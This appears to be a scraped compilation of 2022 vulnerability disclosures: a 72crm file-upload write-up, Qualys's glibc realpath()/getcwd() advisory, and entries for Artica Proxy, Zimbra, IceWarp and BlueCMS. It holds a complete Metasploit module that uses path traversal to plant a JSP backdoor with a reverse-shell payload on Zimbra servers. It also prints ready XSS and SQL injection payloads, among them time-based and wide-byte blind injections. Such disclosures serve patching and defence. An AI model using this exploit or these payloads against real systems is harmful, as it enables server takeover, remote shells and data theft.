72crm 9.0 has an Arbitrary file upload vulnerability.

****Brief of this vulnerability****

72crm v9 has Arbitrary file upload vulnerability Where to upload the logo

****Test Environment****

*   Windows10
*   PHP 5.6.9+Apache/2.4.39

****Affect version****

72crm v9

****Vulnerable Code****

application\\admin\\controller\\System.php line 51  
  
After follow-up, it was found that the validate was not set, and the move operation was performed directly, resulting in the ability to upload any file  
  
follow-up move function（set filename）  
line 352:  
  
follow up function  
Generate time-based file names with php as a suffix  
  
then move\_uploaded\_file with this filename （thinkphp\\library\\think\\File.php line 369）  

****Vulnerability display****

First enter the background  
Click as shown,go to the Enterprise management background  
  
click this  
  
Just upload a picture and capture the package, modify the content as follows  
  
Back to enterprise management background  
  
access image address  
  
php code executed successfully  
Notice：Because it is uploaded at the logo, unauthorized users can also access this php code

CVE-2022-37181: 72crm v9 has Arbitrary file upload vulnerability · Issue #35 · 72wukong/72crm-9.0-PHP

A flaw was found in glibc. The realpath() function can mistakenly return an unexpected value, potentially leading to information leakage and disclosure of sensitive data.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Mon, 24 Jan 2022 14:05:01 +0000
From: Qualys Security Advisory <qsa@...lys.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: CVE-2021-3998 and CVE-2021-3999 in glibc's realpath() and getcwd()

Hi all,

We discovered two vulnerabilities in the glibc, CVE-2021-3998 in
realpath() and CVE-2021-3999 in getcwd(). Patches are now available at
(many thanks to Siddhesh Poyarekar and Red Hat Product Security):

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ee8d5e33adb284601c00c94687bc907e10aec9bb
https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=f7a79879c0b2bef0dadd6caaaeeb0d26423e04e5

https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e
https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=472e799a5f2102bc0c3206dbd5a801765fceb39c

Below is a short write-up (which is part of a longer advisory that is
mostly unrelated to the glibc and that we will publish at a later date):


========================================================================
CVE-2021-3998: Unexpected return value from glibc's realpath()
========================================================================

While auditing umount and fusermount, we also discovered a vulnerability
in the glibc's realpath() function, which is used internally by various
programs. Normally, when the output buffer "resolved" that is passed to
realpath() is not NULL, then realpath() either returns NULL on failure,
or it returns the output buffer "resolved" on success. Unfortunately,
since commit c6e0b0b ("stdlib: Sync canonicalize with gnulib") from
January 2021, realpath() can mistakenly return a malloc()ated buffer
that is neither NULL nor the output buffer "resolved":

------------------------------------------------------------------------
430 char \*
431 \_\_realpath (const char \*name, char \*resolved)
432 {
...
437   struct scratch\_buffer rname\_buffer;
438   return realpath\_stk (name, resolved, &rname\_buffer);
439 }
------------------------------------------------------------------------
197 static char \*
198 realpath\_stk (const char \*name, char \*resolved,
199               struct scratch\_buffer \*rname\_buf)
200 {
...
399   failed = false;
...
403   if (resolved != NULL && dest - rname <= get\_path\_max ())
404     rname = strcpy (resolved, rname);
...
410   if (failed || rname == resolved)
411     {
412       scratch\_buffer\_free (rname\_buf);
413       return failed ? NULL : resolved;
414     }
415 
416   return scratch\_buffer\_dupfree (rname\_buf, dest - rname);
417 }
------------------------------------------------------------------------

For example, if the input path "name" is "." and if the current working
directory is longer than PATH\_MAX, then:

- at line 399, "failed" is set to false;

- at lines 403-404, "rname" is NOT set to "resolved" and "resolved" is
  left untouched and uninitialized (because "dest - rname" is longer
  than PATH\_MAX);

- the code block at lines 410-414 is skipped (because "failed" is false
  and "rname" is not "resolved");

- at line 416, scratch\_buffer\_dupfree() returns a malloc()ated buffer
  that is NOT the output buffer "resolved".

The consequences of this vulnerability depend on the affected programs;
for example, fusermount (a SUID-root program) can disclose sensitive
information (pointers) when displaying the contents of a stack-based
buffer that is mistakenly left uninitialized by realpath() (we tested
this proof of concept on Ubuntu 21.04):

------------------------------------------------------------------------
$ gcc -o CVE-2021-3998-fusermount CVE-2021-3998-fusermount.c
$ ./CVE-2021-3998-fusermount > CVE-2021-3998-fusermount.output
...

$ hexdump -C CVE-2021-3998-fusermount.output
00000000  2f 75 73 72 2f 62 69 6e  2f 66 75 73 65 72 6d 6f  |/usr/bin/fusermo|
00000010  75 6e 74 3a 20 65 6e 74  72 79 20 66 6f 72 20 f0  |unt: entry for .|
00000020  83 9b 99 ff 7f 20 6e 6f  74 20 66 6f 75 6e 64 20  |..... not found |
00000030  69 6e 20 2f 65 74 63 2f  6d 74 61 62 0a 0a 2f 75  |in /etc/mtab../u|
00000040  73 72 2f 62 69 6e 2f 66  75 73 65 72 6d 6f 75 6e  |sr/bin/fusermoun|
00000050  74 3a 20 65 6e 74 72 79  20 66 6f 72 20 39 ac b7  |t: entry for 9..|
00000060  a5 a2 7f 20 6e 6f 74 20  66 6f 75 6e 64 20 69 6e  |... not found in|
00000070  20 2f 65 74 63 2f 6d 74  61 62 0a 0a              | /etc/mtab..|
------------------------------------------------------------------------


========================================================================
CVE-2021-3999: Off-by-one buffer overflow/underflow in glibc's getcwd()
========================================================================

While studying the vulnerability in realpath(), we also discovered a
vulnerability in the glibc's getcwd() function (which is used internally
by realpath() to resolve relative pathnames) -- an off-by-one buffer
overflow and underflow, but if and only if the "size" of "buf" is
exactly 1:

------------------------------------------------------------------------
 48 \_\_getcwd (char \*buf, size\_t size)
 49 {
 ..
 54   size\_t alloc\_size = size;
 ..
 76     path = buf;
 ..
 80   retval = INLINE\_SYSCALL (getcwd, 2, path, alloc\_size);
...
100   if (retval >= 0 || errno == ENAMETOOLONG)
101     {
...
110       result = \_\_getcwd\_generic (path, size);
------------------------------------------------------------------------
158 \_\_getcwd\_generic (char \*buf, size\_t size)
159 {
...
187   size\_t allocated = size;
...
247     dir = buf;
248 
249   dirp = dir + allocated;
250   \*--dirp = '\\0';
...
262   while (!(thisdev == rootdev && thisino == rootino))
263     {
...
441     }
...
449   if (dirp == &dir\[allocated - 1\])
450     \*--dirp = '/';
...
457   used = dir + allocated - dirp;
458   memmove (dir, dirp, used);
------------------------------------------------------------------------

If, at line 48, the "size" of "buf" is exactly 1:

- and if, at line 80, the kernel's getcwd() syscall fails with the error
  ENAMETOOLONG (because the current working directory is longer than
  PATH\_MAX),

- then, at line 110, a generic implementation of getcwd() is called;

- at line 250, a null byte is written to "dirp", which points exactly to
  "buf" (because "size", and hence "allocated", are exactly 1);

- if the code block at lines 262-441 is skipped entirely (if the current
  working directory corresponds to the "/" directory),

- then, at lines 449-450, a slash is written to "buf-1" (an off-by-one
  buffer underflow, because at line 449 "dirp" was still pointing
  exactly to "buf"),

- and, at lines 457-458, a null byte is written to "buf+1" (an
  off-by-one buffer overflow, because at line 457 "used" is exactly 2).

It may seem impossible to satisfy the condition at line 100 (the current
working directory is longer than PATH\_MAX) and the condition at line 262
(the current working directory corresponds to the "/" directory), but in
reality we can:

- in a child process:

  - create an unprivileged mount namespace;

  - create a directory longer than PATH\_MAX;

  - bind-mount "/" onto this directory;

  - open() this directory and send its file descriptor to the parent
    process (outside the unprivileged mount namespace);

- in the parent process:

  - receive the file descriptor of this directory (which corresponds to
    "/" and is longer than PATH\_MAX) and fchdir() to it;

  - execute a SUID program that calls getcwd() with a buffer of size 1,
    which triggers the off-by-one buffer overflow and underflow.

Apparently, this vulnerability was introduced in February 1995 by the
very first commit in the glibc's git history (28f540f, "initial import")
and could be triggered without an unprivileged mount namespace, by
simply chdir()ing to the "/" directory:

------------------------------------------------------------------------
190 getcwd (buf, size)
...
218     path = buf;
...
226   pathp = path + size;
227   \*--pathp = '\\0';
...
242   while (!(thisdev == rootdev && thisino == rootino))
243     {
...
351     }
352 
353   if (pathp == &path\[size - 1\])
354     \*--pathp = '/';
...
359   memmove (path, pathp, path + size - pathp);
------------------------------------------------------------------------

Although "the size of buf is exactly 1" is a strong requirement,
vulnerable code like the following may exist in the wild:

------------------------------------------------------------------------
#include <unistd.h>
#include <stdio.h>

int main(int argc, char \* argv\[\]) {
    char buf\[4096\];
    int len = snprintf(buf, sizeof(buf), "%s: cwd is ", argv\[0\]);
    if (len <= 0 || (unsigned)len >= sizeof(buf)) return \_\_LINE\_\_;
    if (!getcwd(buf + len, sizeof(buf) - len)) return \_\_LINE\_\_;
    puts(buf);
    return 0;
}
------------------------------------------------------------------------


Thank you very much! We are at your disposal for questions, comments,
and further discussions.

With best regards,

-- 
the Qualys Security Advisory team

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2021-3998: security - CVE-2021-3998 and CVE-2021-3999 in glibc's realpath() and getcwd()

An issue was discovered in Artica Proxy 4.30.000000. There is a XSS vulnerability via the password parameter in /fw.login.php.

**CVE-2022-37153**

There is a XSS vulnerability in Artica Proxy 4.30.000000

vulname: Artica Proxy reflected XSS

vulnerable page: /fw.login.php

vulnerable param: password

payload: "><script>alert(1)</script>

FOFA: icon\_hash="-27821316"

CVE-2022-37153: GitHub - Fjowel/CVE-2022-37153: There is a XSS  vulnerability  in Artica Proxy 4.30.000000

This Metasploit module POSTs a ZIP file containing path traversal characters to the administrator interface for Zimbra Collaboration Suite. If successful, it plants a JSP-based backdoor within the web directory, then executes it. The core vulnerability is a path traversal issue in Zimbra Collaboration Suite's ZIP implementation that can result in the extraction of an arbitrary file to an arbitrary location on the host. This issue is exploitable on Zimbra Collaboration Suite Network Edition versions 9.0.0 Patch 23 and below as well as Zimbra Collaboration Suite Network Edition versions 8.8.15 Patch 30 and below.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/zip'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::EXE  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)',        'Description' => %q{          This module POSTs a ZIP file containing path traversal characters to          the administrator interface for Zimbra Collaboration Suite. If          successful, it plants a JSP-based backdoor within the web directory, then          executes it.          The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's          ZIP implementation that can result in the extraction of an arbitrary file          to an arbitrary location on the host.          This issue is exploitable on the following versions of Zimbra:          * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)          * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)          Note that the Open Source Edition is not affected.        },        'Author' => [          'Volexity Threat Research', # Initial writeup          "Yang_99's Nest", # PoC          'Ron Bowes', # Analysis / module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-27925'],          ['CVE', '2022-37042'],          ['URL', 'https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/'],          ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa22-228a'],          ['URL', 'https://www.yang99.top/index.php/archives/82/'],          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24'],          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31'],        ],        'Platform' => 'linux',        'Arch' => [ARCH_X86, ARCH_X64],        'Targets' => [          [ 'Zimbra Collaboration Suite', {} ]        ],        'DefaultOptions' => {          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',          'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbraAdmin/public/',          'TARGET_FILENAME' => nil,          'RPORT' => 7071,          'SSL' => true        },        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2022-05-10',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']),        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),        OptString.new('TARGET_USERNAME', [ true, 'The target user, must be valid on the Zimbra server', 'admin']),      ]    )  end  # Generate an on-system filename using datastore options  def generate_target_filename    if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')      print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')    end    File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp")  end  # Normalize the path traversal and figure out where it is relative to the web root  def zimbra_get_public_path(target_filename)    # Normalize the path    normalized_path = Pathname.new(File.join('/opt/zimbra/log', target_filename)).cleanpath    # Figure out where it is, relative to the webroot    webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/')    relative_path = normalized_path.relative_path_from(webroot)    # Hopefully, we found a path from the webroot to the payload!    if relative_path.to_s.start_with?('../')      return nil    end    relative_path  end  def exploit    print_status('Encoding the payload as a .jsp file')    payload = Msf::Util::EXE.to_jsp(generate_payload_exe)    # Create a file    target_filename = generate_target_filename    print_status("Target filename: #{target_filename}")    # Create a zip file    zip = Rex::Zip::Archive.new    zip.add_file(target_filename, payload)    data = zip.pack    print_status('Sending POST request with ZIP file')    res = send_request_cgi(      'method' => 'POST',      'uri' => "/service/extension/backup/mboximport?account-name=#{datastore['TARGET_USERNAME']}&ow=1&no-switch=1&append=1",      'data' => data    )    # Check the response    if res.nil?      fail_with(Failure::Unreachable, "Could not connect to the target port (#{datastore['RPORT']})")    elsif res.code == 404      fail_with(Failure::NotFound, 'The target path was not found, target is probably not vulnerable')    elsif res.code != 401      print_warning("Unexpected response from the target (expected HTTP/401, got HTTP/#{res.code}) - exploit likely failed")    end    # Get the public path for triggering the vulnerability, terminate if we    # can't figure it out    public_filename = zimbra_get_public_path(target_filename)    if public_filename.nil?      fail_with(Failure::BadConfig, 'Could not determine the public web path, maybe you need to traverse further back?')    end    register_file_for_cleanup(target_filename)    print_status("Trying to trigger the backdoor @ #{public_filename}")    # Trigger the backdoor    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(public_filename)    )    if res.nil?      fail_with(Failure::Unreachable, 'Could not connect to trigger the payload')    elsif res.code == 200      print_good('Successfully triggered the payload')    elsif res.code == 404      fail_with(Failure::Unknown, "Payload was not uploaded, the server probably isn't vulnerable")    else      fail_with(Failure::Unknown, "Could not connect to the server to trigger the payload: HTTP/#{res.code}")    end  endend

Zimbra Zip Path Traversal

Stored cross-site scripting vulnerability in Exment ((PHP8) exceedone/exment v5.0.2 and earlier and exceedone/laravel-admin v3.0.0 and earlier, (PHP7) exceedone/exment v4.4.2 and earlier and exceedone/laravel-admin v2.2.2 and earlier) allows a remote authenticated attacker to inject an arbitrary script.

CVE-2022-38089: Document

IceWarp WebClient DC2 - Update 2 Build 9 (13.0.2.9) was discovered to contain a SQL injection vulnerability via the search parameter at /webmail/server/webmail.php.

\[+\] Title: IceWarp WebClient \[+\] Author: veyselxan \[+\] Vendor Homepage:https://www.icewarp.com/ \[+\] Tested on: Windows 10 \[+\] Versions: 13.0.2.9 \[+\] Fix version: DC2 - Update 2 Build 10 (13.0.2.10) \[+\] Vulnerability Type: SQL injection \[+\] Vulnerable Parameter: "search" \[+\] Vulnerable File: webmail/server/webmail.php \[+\] Cve:CVE-2022-35115 \[+\] Video POC: https://youtu.be/E04ZuqISASQ \[+\] Exploit: INJECTION\_CODE\_POC') AND (SELECT 9056 FROM (SELECT(SLEEP(5)))Ouc0) AND ('bvsb'=bvsb \[+\] Payload: 240 IceWarp WebClient DC2 - Update 2 Build 9 (13.0.2.9) was discovered to contain a SQL injection vulnerability via the search parameter at /webmail/server/webmail.php.

CVE-2022-35115

Multiple Authenticated (contributor+) Persistent Cross-Site Scripting (XSS) vulnerabilities in W3 Eden Download Manager plugin <= 3.2.48 at WordPress.

CVE-2022-34658: Download Manager

Bluecms 1.6 has SQL injection in line 132 of admin/area.php

**Bluecms\_v1.6****Download**

http://lp.downcode.com/j\_14/j\_14745\_bluecms.rar

**vulnerability code:**

in admin/area.php line 36:  
  
Line 36 of admin/area.php is not heavily filtered, and insert at line 47 allows injection  
Single quotes cannot be injected because the argument passed in is get\_magic\_quotes\_gpc()  
However, we found the use code GB2312 in the returned response header  
  
  
So we can do wide-byte injection here  
payload: area\_name=0%df',0,0,0,0),(0,@@Version,0,0,0,0)%23&parentid=0&show\_order=0&act=doadd  
  
  
Successful injection！

CVE-2022-37113: Bluecms V1.6 has SQL injection in line 132 of admin/area.php · Issue #3 · seizer-zyx/Vulnerability

BlueCMS 1.6 has SQL injection in line 55 of admin/model.php

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-37112: Bluecms V1.6 has SQL injection in line 55 of admin/model.php · Issue #2 · seizer-zyx/Vulnerability

BlueCMS 1.6 has SQL injection in line 132 of admin/article.php

**Bluecms\_v1.6****Download**

http://lp.downcode.com/j\_14/j\_14745\_bluecms.rar

**vulnerability code:**

in admin/article.php line132:  
  
There is numeric injection for $\_GET\['id'\]  
Because there is no echo, you can blind SQL injection with sleep()  
payload: id=1%20or%20if(1=1,sleep(1),0)  
  
payload: id=1%20or%20if(1=2,sleep(1),0)  
  
sleep () is executed based on the server response speed  
Use exp to get the database version number

Tag

#php